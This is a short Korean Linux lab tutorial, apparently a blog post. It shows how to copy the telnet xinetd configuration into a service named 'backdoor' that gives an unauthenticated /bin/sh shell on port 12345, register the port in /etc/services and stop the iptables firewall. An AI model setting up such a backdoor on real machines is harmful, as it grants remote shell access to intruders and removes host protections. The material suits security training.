[리눅스] telnet 서버의 형태로 /bin/sh 쉘 제공하기

GOAL

- /etc/xinetd.d/telnet 파일을 이용해 새로운 telnet과 비슷한 서버를 구축하여 23이 아닌 다른 포트로

접속했을  때, /bin/sh 쉘을 제공하도록 한다.

- 본 실습에 앞서 yum -y install telnet*를 입력하여 서버와 클라이언트에 모두 설치해준다.

 

먼저 일반적으로 telnet 접속했을 때의 화면을 보자.

 

1. /etc/xinetd.d/telnet 파일을 /etc/xinetd.d/backdoor로 복사해준다.

2. # vi /etc/xinetd.d/backdoor

>> 12345포트로 접속한 사용자에게 /bin/sh 쉘을 제공한다. 

3. # echo "backdoor 12345/tcp" >> /etc/services

/etc/services에 서비스 이름과 포트, 프로토콜을 추가해준다. (/etc/services 파일을 직접 수정해도 된다.)

4. 방화벽 포트 허용 또는 방화벽을 꺼준다. 빠른 실습을 위해 방화벽을 끄는 방법을 사용했다.

# service iptables stop

5. xinetd 서비스 시작

만들어 준 backdoor는 /etc/xinetd.d/ 에 있는 xinetd의 child daemon이므로 xinetd 서비스를 시작해주어야 한다.

# service xinetd restart

6. 외부에서 접속해보기.